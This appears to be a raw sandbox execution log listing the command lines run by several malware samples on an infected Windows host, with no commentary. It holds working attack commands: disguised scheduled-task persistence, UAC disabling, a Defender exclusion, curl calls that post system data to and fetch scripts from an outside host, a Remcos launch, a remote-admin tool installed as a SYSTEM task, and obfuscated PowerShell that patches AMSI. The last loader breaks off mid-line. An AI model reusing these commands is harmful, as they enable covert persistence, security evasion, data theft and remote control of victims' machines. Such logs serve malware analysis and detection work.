schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe

"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe

"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe

"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe

"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe

"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe

"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"

C:\Windows\sysWOW64\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\mode.com

mode 65,10

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\TJEKXB16P8YU" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe

"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"

C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe

"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"

C:\Users\Admin\AppData\Local\Temp\a\RMX.exe

"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\ProgramData\Remcos\remcos.exe

C:\ProgramData\Remcos\remcos.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe

"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp8940.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp8940.tmp.bat

C:\Windows\System32\certutil.exe

"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp8F8B.tmp"

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\0ZMGV3WBIMOZ" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe

"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\a\888.exe

"C:\Users\Admin\AppData\Local\Temp\a\888.exe"

C:\Users\Admin\AppData\Local\Temp\a\50to.exe

"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OusSSdhPuLxi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QInBQxSBfZZAsX,[Parameter(Position=1)][Type]$LyLdkwlWQS)$ORvKUsgQbrR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+[Char](103)+'at'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'Mem'+[Char](111)+''+'r'+''+'y'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'y'+[Char](112)+'e','C'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'e'+[Char](97)+'l'+[Char](101)+'d,A'+'n'+''+[Char](115)+'iCla'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+'Cl'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$ORvKUsgQbrR.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+'H'+'i'+''+[Char](100)+'eB'+[Char](121)+'S'+'i'+''+'g'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QInBQxSBfZZAsX).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e,M'+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+[Char](100)+'');$ORvKUsgQbrR.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+'k'+''+'e'+'','Publ'+[Char](105)+'c'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+[Char](121)+'S'+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+'t'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$LyLdkwlWQS,$QInBQxSBfZZAsX).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+'a'+'na'+'g'+''+'e'+''+'d'+'');Write-Output $ORvKUsgQbrR.CreateType();}$BSBNuHYFkbUyt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+'m'+'.'+''+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+'c'+'r'+'o'+[Char](115)+'o'+'f'+'t.'+'W'+'i'+[Char](110)+'32'+[Char](46)+''+[Char](85)+'n'+'s'+''+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+'s'+'');$ZBAXfvmULcfjxM=$BSBNuHYFkbUyt.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'ub'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dSubbgjffuYELrORmmy=OusSSdhPuLxi @([String])([IntPtr]);$SZRwYTmJmiiiHaTsOfzHWm=OusSSdhPuLxi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aGfEDqWahrc=$BSBNuHYFkbUyt.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'H'+'a'+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+'n'+''+'e'+''+[Char](108)+''+'3'+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$eBAdzaQknFGZQN=$ZBAXfvmULcfjxM.Invoke($Null,@([Object]$aGfEDqWahrc,[Object]('L'+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+''+'r'+''+[Char](97)+''+'r'+''+[Char](121)+'A')));$FRhoKnJoYBDxOeQMU=$ZBAXfvmULcfjxM.Invoke($Null,@([Object]$aGfEDqWahrc,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+'r'+''+'o'+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$LVaUOWQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eBAdzaQknFGZQN,$dSubbgjffuYELrORmmy).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+'ll');$XPthUEgwNOjZyIAIp=$ZBAXfvmULcfjxM.Invoke($Null,@([Object]$LVaUOWQ,[Object]('A'+[Char](109)+'s'+[Char](105)+'S'+[Char](99)+'a'+'n'+''+[Char](66)+''+'u'+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$iDexgLQdEY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FRhoKnJoYBDxOeQMU,$SZRwYTmJmiiiHaTsOfzHWm).Invoke($XPthUEgwNOjZyIAIp,[uint32]8,4,[ref]$iDexgLQdEY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XPthUEgwNOjZyIAIp,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FRhoKnJoYBDxOeQMU,$SZRwYTmJmiiiHaTsOfzHWm).Invoke($XPthUEgwNOjZyIAIp,[uint32]8,0x20,[ref]$iDexgLQdEY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+'A'+[Char](82)+''+'E'+'').GetValue(''+'r'+'u'+'t'+''+'s'+''+[Char](115)+'ta'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{d6041156-b889-464b-8b38-c9e6ef863c21}

C:\Windows\system32\lsass.exe

"C:\Windows\system32\lsass.exe"

C:\Windows\System32\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im conhost.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\info.exe

"C:\Users\Admin\AppData\Local\Temp\a\info.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\regedit.exe

regedit /s "C:\Windows\SysWOW64\ruts\11.reg

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c delete.bat

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\50.exe

"C:\Users\Admin\AppData\Local\Temp\a\50.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WlncqTHGvucm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TTKOZQvOgZHXbv,[Parameter(Position=1)][Type]$jhmUMoYGDW)$UZHZLRmKXRD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+'m'+'o'+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+'e'+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+'at'+'e'+''+'T'+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+'ss,'+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+'e'+'d'+''+[Char](44)+''+'A'+'ns'+'i'+'Cl'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$UZHZLRmKXRD.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+'e'+',H'+'i'+''+[Char](100)+'e'+'B'+'y'+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TTKOZQvOgZHXbv).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+'i'+'m'+'e'+','+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+'g'+'ed');$UZHZLRmKXRD.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+'w'+'S'+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$jhmUMoYGDW,$TTKOZQvOgZHXbv).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $UZHZLRmKXRD.CreateType();}$mZuNEiLyRtCUp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+'icro'+'s'+'of'+[Char](116)+''+[Char](46)+'W'+'i'+''+[Char](110)+''+'3'+''+'2'+''+'.'+'U'+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+'ve'+[Char](77)+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+'s'+'');$caQOLnnOVyUQtA=$mZuNEiLyRtCUp.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+'d'+[Char](100)+'re'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GHtBpXAToHgwfgfoTzU=WlncqTHGvucm @([String])([IntPtr]);$PoeYYrnupxOdRIAddSDagH=WlncqTHGvucm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kecPIvrIYuu=$mZuNEiLyRtCUp.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$HxYnexSUiwjHEM=$caQOLnnOVyUQtA.Invoke($Null,@([Object]$kecPIvrIYuu,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$URmAhnvwEKANDSeyw=$caQOLnnOVyUQtA.Invoke($Null,@([Object]$kecPIvrIYuu,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+'rot'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$TyKejPz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HxYnexSUiwjHEM,$GHtBpXAToHgwfgfoTzU).Invoke('a'